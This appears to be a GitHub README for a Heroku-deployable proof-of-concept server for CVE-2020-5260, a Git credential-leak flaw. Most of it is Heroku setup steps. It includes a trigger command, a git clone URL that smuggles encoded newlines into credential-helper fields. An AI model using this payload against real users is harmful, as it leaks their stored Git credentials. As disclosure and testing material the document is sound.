Awesome
cve-2020-5260
A HTTP PoC Endpoint for cve-2020-5260 which can be deployed to Heroku
CREDIT INFORMATION
Felix Wilhelm of Google Project Zero https://bugs.chromium.org/p/project-zero/issues/detail?id=2021
Trigger the vuln
git clone 'https://YourHerokuAppNameAndNotMine.herokuapp.com?%0ahost=github.com%0aprotocol=ssh'
Get PoC onto Heroku
Click this button to automagically deploy to Heroku...
Or follow the steps below...
Yes, I understand the irony of having to run Git clone commands to setup this PoC....
Install the Heroku CLI via https://devcenter.heroku.com/articles/heroku-cli
If you haven't already, log in to your Heroku account and follow the prompts to create a new SSH public key.
$ heroku login
Clone the repository
Use Git to clone cve-2020-5260's source code to your local machine.
$ mkdir cve-2020-5260
$ cd cve-2020-5260
$ git init
$ heroku apps:create cve-2020-5260
$ git clone https://github.com/brompwnie/cve-2020-5260
Deploy your changes
Make some changes to the code you just cloned and deploy them to Heroku using Git.
$ git add .
$ git commit -am "make it better"
$ git push heroku master